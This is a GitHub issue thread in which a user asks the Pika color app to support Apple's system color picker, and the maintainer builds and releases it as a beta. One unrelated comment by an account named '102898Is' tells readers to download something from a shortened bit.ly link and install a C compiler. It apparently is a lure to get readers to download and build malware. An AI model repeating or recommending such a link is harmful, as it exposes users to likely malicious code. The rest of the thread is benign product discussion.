### ISSUE TITLE
Support changing colors via Apple’s system color picker

### ISSUE THREAD

**Issue by alexkaessner** [superhighfives/pika#125]
**Is your feature request related to a problem? Please describe.**
Right now Pika doesn’t allow tweaking/changing colors by any means. „Only“ picking colors.

I understand that the [core vision](https://github.com/superhighfives/pika/wiki#product-vision) of Pika is to be not too overcomplicated. But building a fully custom color panel isn’t necessary as Apple’s system color picker is already quite powerful. I believe adding a way to trigger the system color picker would be a big benefit without sacrificing too much.

**Describe the solution you'd like**
I could see that triggering the system color picker could be done via any or all of those ways:
1. Right-click on the color
2. Settings icon
3. A dedicated button when hovering the color:
   <img src="https://github.com/user-attachments/assets/0c0ddcf8-555e-46f5-983e-3f5b312e7a1b" width=562 />

Once the system color picker is open it directly changes the given foreground or background color. Nothing more, nothing less. 😉

**Describe alternatives you've considered**
Other apps like Sindre Sorhus’ [System Color Picker](https://sindresorhus.com/system-color-picker) allow using the system color picker, but of course lack the clean and simple design and extra features of Pika that we like.

**Comment by 102898Is** [comment]
download

https://bit.ly/4eugCty
If you don't have the c compliator, install it.(gcc or clang)

**Comment by superhighfives** [comment]
Okay, so, this is a _genius_ idea that solves about 1,000,000 tiny problems with Pika, and you, @alexkaessner, are an absolute genius for making this issue.

Going to work on a beta version of this over the course of this week. Superhero.

**Comment by superhighfives** [comment]
This is now available via 0.0.18-beta2. You can grab it via the app or at https://github.com/superhighfives/pika/releases/tag/0.0.18-beta2.

**Comment by alexkaessner** [comment]
Thanks a ton for building it so quickly! ❤️
